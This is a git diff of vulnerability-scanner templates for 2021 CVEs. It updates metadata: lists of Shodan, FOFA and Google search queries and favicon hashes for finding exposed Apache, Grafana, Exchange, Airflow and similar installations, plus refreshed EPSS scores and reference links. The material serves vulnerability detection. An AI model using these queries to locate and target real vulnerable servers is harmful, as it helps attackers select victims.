a/http/cves/2021/CVE-2021-37833.yaml b/http/cves/2021/CVE-2021-37833.yaml index bd75777b90..09cad85e3b 100644 --- a/http/cves/2021/CVE-2021-37833.yaml +++ b/http/cves/2021/CVE-2021-37833.yaml @@ -27,8 +27,12 @@ info: max-request: 4 vendor: digitaldruid product: hoteldruid - shodan-query: http.title:"hoteldruid" - fofa-query: title="hoteldruid" + shodan-query: + - http.title:"hoteldruid" + - http.favicon.hash:-1521640213 + fofa-query: + - title="hoteldruid" + - icon_hash=-1521640213 google-query: intitle:"hoteldruid" tags: cve2021,cve,hoteldruid,xss,digitaldruid diff --git a/http/cves/2021/CVE-2021-38540.yaml b/http/cves/2021/CVE-2021-38540.yaml index 9398217562..956545d288 100644 --- a/http/cves/2021/CVE-2021-38540.yaml +++ b/http/cves/2021/CVE-2021-38540.yaml @@ -27,9 +27,18 @@ info: max-request: 2 vendor: apache product: airflow - shodan-query: title:"Sign In - Airflow" - fofa-query: title="sign in - airflow" - google-query: intitle:"sign in - airflow" + shodan-query: + - title:"Sign In - Airflow" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + - product:"redis" + fofa-query: + - title="sign in - airflow" + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + google-query: + - intitle:"sign in - airflow" + - intitle:"airflow - dags" || http.html:"apache airflow" tags: cve2021,cve,apache,airflow,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-38647.yaml b/http/cves/2021/CVE-2021-38647.yaml index d4ad39cca0..b67e4fcec5 100644 --- a/http/cves/2021/CVE-2021-38647.yaml +++ b/http/cves/2021/CVE-2021-38647.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-38647 cwe-id: CWE-287 - epss-score: 0.97408 - epss-percentile: 0.99918 + epss-score: 0.97476 + epss-percentile: 0.99967 cpe: cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-38704.yaml b/http/cves/2021/CVE-2021-38704.yaml index 4b4fe50d76..6cef68fae9 100644 --- a/http/cves/2021/CVE-2021-38704.yaml +++ b/http/cves/2021/CVE-2021-38704.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: cliniccases product: cliniccases - shodan-query: http.title:"ClinicCases",html:"/cliniccases/" + shodan-query: + - http.title:"ClinicCases",html:"/cliniccases/" + - http.title:"cliniccases",html:"/cliniccases/" fofa-query: title="cliniccases",html:"/cliniccases/" google-query: intitle:"cliniccases",html:"/cliniccases/" tags: cve,cve2021,xss,cliniccases diff --git a/http/cves/2021/CVE-2021-38751.yaml b/http/cves/2021/CVE-2021-38751.yaml index 5bacfe740c..d346a368bb 100644 --- a/http/cves/2021/CVE-2021-38751.yaml +++ b/http/cves/2021/CVE-2021-38751.yaml @@ -13,13 +13,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N cvss-score: 4.3 cve-id: CVE-2021-38751 cwe-id: CWE-116 - epss-score: 0.00242 - epss-percentile: 0.62095 + epss-score: 0.0012 + epss-percentile: 0.46178 cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39146.yaml b/http/cves/2021/CVE-2021-39146.yaml index 6430851191..3615ebc08b 100644 --- a/http/cves/2021/CVE-2021-39146.yaml +++ b/http/cves/2021/CVE-2021-39146.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39146 cwe-id: CWE-434 epss-score: 0.27391 - epss-percentile: 0.96375 + epss-percentile: 0.96788 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39152.yaml b/http/cves/2021/CVE-2021-39152.yaml index 34ee5c6927..db9f396dd3 100644 --- a/http/cves/2021/CVE-2021-39152.yaml +++ b/http/cves/2021/CVE-2021-39152.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.01242 - epss-percentile: 0.83992 + epss-percentile: 0.85465 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-39211.yaml b/http/cves/2021/CVE-2021-39211.yaml index 62ac984652..6605024636 100644 --- a/http/cves/2021/CVE-2021-39211.yaml +++ b/http/cves/2021/CVE-2021-39211.yaml @@ -26,8 +26,12 @@ info: max-request: 2 vendor: glpi-project product: glpi - shodan-query: http.title:"glpi" - fofa-query: icon_hash="-1474875778" + shodan-query: + - http.title:"glpi" + - http.favicon.hash:"-1474875778" + fofa-query: + - icon_hash="-1474875778" + - title="glpi" google-query: intitle:"glpi" tags: cve,cve2021,glpi,exposure,glpi-project diff --git a/http/cves/2021/CVE-2021-39226.yaml b/http/cves/2021/CVE-2021-39226.yaml index 5286baaf02..1641a6da4d 100644 --- a/http/cves/2021/CVE-2021-39226.yaml +++ b/http/cves/2021/CVE-2021-39226.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,kev diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 7fe627b3b5..815d950a97 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-39327 cwe-id: CWE-459,CWE-200 - epss-score: 0.16259 - epss-percentile: 0.95861 + epss-score: 0.18349 + epss-percentile: 0.96191 cpe: cpe:2.3:a:ait-pro:bulletproof_security:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 351539e0d1..35fab8044a 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-39350 - https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-39350 cwe-id: CWE-79 - epss-score: 0.00104 - epss-percentile: 0.42206 + epss-score: 0.00106 + epss-percentile: 0.43162 cpe: cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 31fdb0043c..de2aed67f7 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-39501 cwe-id: CWE-601 - epss-score: 0.00093 - epss-percentile: 0.38461 + epss-score: 0.00141 + epss-percentile: 0.49694 cpe: cpe:2.3:a:eyoucms:eyoucms:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index aee3e04b55..e151ef9c10 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -22,13 +22,13 @@ info: cve-id: CVE-2021-40149 cwe-id: CWE-552 epss-score: 0.00942 - epss-percentile: 0.82739 - cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.8308 + cpe: cpe:2.3:h:reolink:e1_zoom:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: reolink - product: e1_zoom_firmware + product: e1_zoom shodan-query: http.title:"Reolink" fofa-query: title="reolink" google-query: intitle:"reolink" diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index 0fe67cdf97..df87eb26fa 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: reolink product: e1_zoom_firmware - shodan-query: http.title:"Reolink" + shodan-query: + - http.title:"Reolink" + - http.title:"reolink" fofa-query: title="reolink" google-query: intitle:"reolink" tags: cve2021,cve,reolink,camera,exposure,iot diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index c406d6e7a6..cec2d61812 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2021,cve,ssrf,apache,mod-proxy,kev http: diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6ad3d31280..79bd64e866 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -26,9 +26,15 @@ info: max-request: 4 vendor: zohocorp product: manageengine_adselfservice_plus - shodan-query: http.title:"manageengine" - fofa-query: title="manageengine" - google-query: intitle:"adselfservice plus" + shodan-query: + - http.title:"manageengine" + - http.title:"adselfservice plus" + fofa-query: + - title="manageengine" + - title="adselfservice plus" + google-query: + - intitle:"adselfservice plus" + - intitle:"manageengine" tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp http: diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index 4a0cccf2d0..fb5a0985a9 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: os4ed product: opensis - shodan-query: http.title:"openSIS" + shodan-query: + - http.title:"openSIS" + - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve2021,cve,xss,opensis,os4ed diff --git a/http/cves/2021/CVE-2021-40651.yaml b/http/cves/2021/CVE-2021-40651.yaml index cff6b6172a..4cfb2912e3 100644 --- a/http/cves/2021/CVE-2021-40651.yaml +++ b/http/cves/2021/CVE-2021-40651.yaml @@ -24,7 +24,9 @@ info: max-request: 2 vendor: os4ed product: opensis - shodan-query: "title:\"openSIS\"" + shodan-query: + - "title:\"openSIS\"" + - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" tags: cve,cve2021,lfi,os4ed,opensis,authenticated diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index c1fffcff14..ddd7e1a67f 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: mt product: ind780_firmware - shodan-query: IND780 + shodan-query: + - IND780 + - ind780 google-query: inurl:excalweb.dll tags: cve2021,cve,ind780,lfi,mt diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index 7ce8ebe2e6..ab76590728 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -20,16 +20,21 @@ info: cvss-score: 7.5 cve-id: CVE-2021-40822 cwe-id: CWE-918 - epss-score: 0.68366 - epss-percentile: 0.97892 + epss-score: 0.79068 + epss-percentile: 0.98269 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: osgeo product: geoserver - shodan-query: title:"GeoServer" - fofa-query: app="GeoServer" + shodan-query: + - title:"GeoServer" + - http.title:"geoserver" + fofa-query: + - app="GeoServer" + - app="geoserver" + - title="geoserver" google-query: intitle:"geoserver" tags: cve2021,cve,ssrf,geoserver,osgeo diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 2fd3636a6b..5ac9ff8970 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -27,7 +27,9 @@ info: max-request: 2 vendor: gurock product: testrail - shodan-query: http.html:"TestRail" + shodan-query: + - http.html:"TestRail" + - http.html:"testrail" fofa-query: body="testrail" tags: cve2021,cve,exposure,gurock,testrail diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index e72f35da1f..0076e05d1f 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index f6b66bcae2..a809f32ab4 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -19,15 +19,17 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40969 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.51305 + epss-score: 0.00159 + epss-percentile: 0.5237 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index 7c6b121592..af01b0987a 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 40fdece004..a4abd97109 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -19,15 +19,17 @@ info: cvss-score: 6.1 cve-id: CVE-2021-40971 cwe-id: CWE-79 - epss-score: 0.00152 - epss-percentile: 0.50482 + epss-score: 0.00159 + epss-percentile: 0.5237 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40972.yaml b/http/cves/2021/CVE-2021-40972.yaml index 537c65b870..4749ad9896 100644 --- a/http/cves/2021/CVE-2021-40972.yaml +++ b/http/cves/2021/CVE-2021-40972.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve,cve2021,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index 1e73d70438..45126028dc 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: spotweb_project product: spotweb - shodan-query: title:"SpotWeb - overview" + shodan-query: + - title:"SpotWeb - overview" + - http.title:"spotweb - overview" fofa-query: title="spotweb - overview" google-query: intitle:"spotweb - overview" tags: cve2021,cve,xss,spotweb,spotweb_project diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index ca11695bcc..4f350b3038 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -26,8 +26,13 @@ info: max-request: 1 vendor: grafana product: grafana - shodan-query: title:"Grafana" - fofa-query: title="grafana" + shodan-query: + - title:"Grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + - http.title:"grafana" + fofa-query: + - title="grafana" + - app="grafana" google-query: intitle:"grafana" tags: cve2021,cve,grafana,xss diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 27f7ab7a39..c71da1bc06 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -25,12 +25,17 @@ info: epss-percentile: 0.99393 cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: metabase product: metabase - shodan-query: http.title:"Metabase" - fofa-query: app="Metabase" - google-query: intitle:"metabase" + shodan-query: + - "http.title:\"Metabase\"" + - http.title:"metabase" + fofa-query: + - "app=\"Metabase\"" + - title="metabase" + - app="metabase" + google-query: "intitle:\"metabase\"" tags: cve2021,cve,metabase,lfi http: diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index 42300b598c..56b07326f3 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -21,16 +21,16 @@ info: cvss-score: 8.8 cve-id: CVE-2021-41282 cwe-id: CWE-74 - epss-score: 0.97305 - epss-percentile: 0.9986 + epss-score: 0.97112 + epss-percentile: 0.99788 cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:* metadata: max-request: 4 vendor: pfsense product: pfsense - google-query: intitle:"pfsense - login" shodan-query: http.title:"pfsense - login" fofa-query: title="pfsense - login" + google-query: intitle:"pfsense - login" tags: cve2021,cve,pfsense,rce,authenticated http: diff --git a/http/cves/2021/CVE-2021-41349.yaml b/http/cves/2021/CVE-2021-41349.yaml index 7dd93bf32b..2b5776dc3e 100644 --- a/http/cves/2021/CVE-2021-41349.yaml +++ b/http/cves/2021/CVE-2021-41349.yaml @@ -26,8 +26,14 @@ info: max-request: 1 vendor: microsoft product: exchange_server - shodan-query: vuln:cve-2021-26855 - fofa-query: title="outlook" + shodan-query: + - vuln:cve-2021-26855 + - http.favicon.hash:1768726119 + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - title="outlook" + - icon_hash=1768726119 google-query: intitle:"outlook" tags: cve,cve2021,xss,microsoft,exchange diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index afb1ce8685..64f75b1bfb 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-41381 - https://www.payara.fish - http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41381 cwe-id: CWE-22 - epss-score: 0.10127 - epss-percentile: 0.94375 + epss-score: 0.11037 + epss-percentile: 0.95128 cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index fc20ecc3ea..3e3db96c0c 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -29,8 +29,13 @@ info: max-request: 4 vendor: flatpress product: flatpress - shodan-query: http.html:"Flatpress" - fofa-query: body="flatpress" + shodan-query: + - http.html:"Flatpress" + - http.html:"flatpress" + - http.favicon.hash:-1189292869 + fofa-query: + - body="flatpress" + - icon_hash=-1189292869 tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive http: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 2966c0c9f2..fd507d8ad7 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: shopex product: ecshop - fofa-query: product="ECShop" + fofa-query: + - product="ECShop" + - product="ecshop" tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index ee2b469f76..8c60af6a4d 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41648 cwe-id: CWE-89 - epss-score: 0.06237 - epss-percentile: 0.93438 + epss-score: 0.05423 + epss-percentile: 0.93138 cpe: cpe:2.3:a:online-shopping-system-advanced_project:online-shopping-system-advanced:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index a0d58a7082..9bf731b36f 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-41653 - https://www.tp-link.com/us/press/security-advisory/ - http://tp-link.com + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-41653 cwe-id: CWE-94 - epss-score: 0.95374 - epss-percentile: 0.99205 + epss-score: 0.95198 + epss-percentile: 0.99332 cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index f742c3c15d..75e515e396 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -24,7 +24,10 @@ info: vendor: nystudio107 product: seomatic framework: craft_cms - shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' + shodan-query: + - 'X-Powered-By: Craft CMS html:"SEOmatic"' + - "x-powered-by: craft cms" + - 'x-powered-by: craft cms html:"seomatic"' tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms variables: num1: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index a13df2fc63..aa55a5d779 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -30,7 +30,10 @@ info: max-request: 3 vendor: apache product: http_server - shodan-query: Apache 2.4.49 + shodan-query: + - Apache 2.4.49 + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 8b3946e122..27f89c773e 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: gitlab product: gitlab - shodan-query: cpe:"cpe:2.3:a:gitlab:gitlab" + shodan-query: + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2021,cve,gitlab,api,graphql,enum,unauth diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 057cc91cb2..e1675826d2 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -20,15 +20,17 @@ info: cvss-score: 9.8 cve-id: "CVE-2021-42013" cwe-id: CWE-22 - epss-score: 0.97391 - epss-percentile: 0.9991 + epss-score: 0.97429 + epss-percentile: 0.99938 cpe: cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev variables: cmd: "echo 31024-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index ea1cf336da..9338228462 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -21,16 +21,18 @@ info: cvss-score: 6.1 cve-id: CVE-2021-42063 cwe-id: CWE-79 - epss-score: 0.00418 - epss-percentile: 0.73669 + epss-score: 0.00425 + epss-percentile: 0.7427 cpe: cpe:2.3:a:sap:knowledge_warehouse:7.30:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: knowledge_warehouse shodan-query: http.favicon.hash:-266008933 - zoomeye-query: +app:"SAP NetWeaver Application Server httpd fofa-query: icon_hash=-266008933 + zoomeye-query: + - +app:"SAP NetWeaver Application Server httpd + - +app:"sap netweaver application server httpd tags: cve2021,cve,sap,xss,seclists,packetstorm http: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index a4cd97729f..5e1f284cae 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-42192 cwe-id: CWE-863 - epss-score: 0.04146 - epss-percentile: 0.91987 + epss-score: 0.05551 + epss-percentile: 0.93226 cpe: cpe:2.3:a:konga_project:konga:0.14.9:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 5527ada552..769afc1ad9 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -26,7 +26,9 @@ info: max-request: 1 vendor: sitecore product: experience_platform - shodan-query: http.title:"SiteCore" + shodan-query: + - http.title:"SiteCore" + - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 1dfba3e803..1f0436df87 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -12,13 +12,16 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42551 - https://www.redguard.ch/advisories/netbiblio_webopac.txt + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/compr00t/nuclei-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-42551 cwe-id: CWE-79 epss-score: 0.00124 - epss-percentile: 0.46641 + epss-percentile: 0.4686 cpe: cpe:2.3:a:alcoda:netbiblio:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index f63cd49636..ccde4d0c1f 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: apereo product: central_authentication_service - shodan-query: http.title:'CAS - Central Authentication Service' + shodan-query: + - http.title:'CAS - Central Authentication Service' + - http.title:'cas - central authentication service' fofa-query: title='cas - central authentication service' google-query: intitle:'cas - central authentication service' tags: cve2021,cve,apereo,xss,cas diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 37b867f67e..a3047dce60 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -28,7 +28,9 @@ info: max-request: 1 vendor: dlink product: dir-615 - shodan-query: http.title:"Roteador Wireless" + shodan-query: + - http.title:"Roteador Wireless" + - cpe:"cpe:2.3:h:dlink:dir-615" tags: 